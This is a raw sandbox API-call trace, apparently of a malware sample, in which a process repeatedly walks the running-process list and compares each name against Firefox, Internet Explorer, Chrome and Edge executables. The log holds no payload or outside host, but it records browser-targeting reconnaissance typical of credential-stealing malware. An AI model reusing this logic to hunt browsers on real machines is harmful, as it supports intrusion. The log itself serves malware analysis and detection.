1 [0212.698] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.698] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.698] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0212.698] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0212.699] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0212.699] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.699] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0212.699] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0212.699] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0212.699] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0212.699] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.699] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.700] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.700] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.700] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.700] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.700] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0212.700] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0212.700] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0212.700] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0212.700] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.700] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0212.701] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0212.701] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0212.701] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0212.701] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.701] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0212.701] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0212.701] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0212.701] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0212.702] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.702] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0212.702] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0212.702] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0212.702] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0212.702] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.702] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0212.703] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0212.703] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0212.703] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0212.703] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.703] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0212.703] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0212.703] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0212.703] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0212.703] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.703] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0212.704] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0212.704] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0212.704] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0212.704] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.704] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0212.704] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0212.704] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0212.704] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0212.704] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.704] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0212.705] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0212.705] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0212.705] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0212.705] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.705] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0212.706] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0212.706] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0212.706] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0212.706] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.706] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0212.706] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0212.706] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0212.706] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0212.706] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.706] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0212.707] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0212.707] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0212.707] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0212.707] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.707] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0212.707] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0212.707] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0212.707] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0212.707] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.707] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0212.708] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0212.708] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0212.708] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0212.708] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.708] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0212.708] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0212.709] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0212.709] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0212.709] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.709] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0212.709] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0212.709] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0212.709] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0212.709] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.709] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0212.710] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0212.710] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0212.710] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0212.710] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.710] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0212.710] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0212.710] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0212.710] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0212.710] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.710] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0212.711] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0212.711] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0212.711] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0212.711] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.711] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0212.711] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0212.711] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0212.711] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0212.711] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.711] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0212.712] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0212.712] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0212.712] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0212.712] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.712] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0212.712] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0212.713] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0212.713] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0212.713] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.713] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.713] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0212.713] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0212.713] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0212.713] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.713] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.714] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.714] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.714] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.714] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.714] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0212.714] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0212.714] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0212.714] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0212.714] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.714] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.715] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.715] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.715] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.715] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.715] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0212.715] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0212.715] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0212.715] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0212.715] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.715] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.716] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0212.716] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0212.716] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0212.716] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.716] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0212.777] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0212.777] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0212.777] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0212.777] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.777] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.778] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0212.778] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0212.778] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0212.778] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.778] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.779] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0212.779] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0212.779] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0212.779] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.779] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.779] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0212.779] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0212.779] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0212.779] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.779] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.780] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0212.780] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0212.780] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0212.780] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.780] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.780] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0212.780] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0212.780] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0212.780] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.780] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0212.781] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0212.781] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0212.781] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0212.781] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0212.781] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0212.781] CloseHandle (hObject=0xd4) returned 1 [0212.782] Sleep (dwMilliseconds=0x3e8) [0213.863] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0213.865] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.866] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0213.866] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0213.866] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0213.866] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0213.866] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 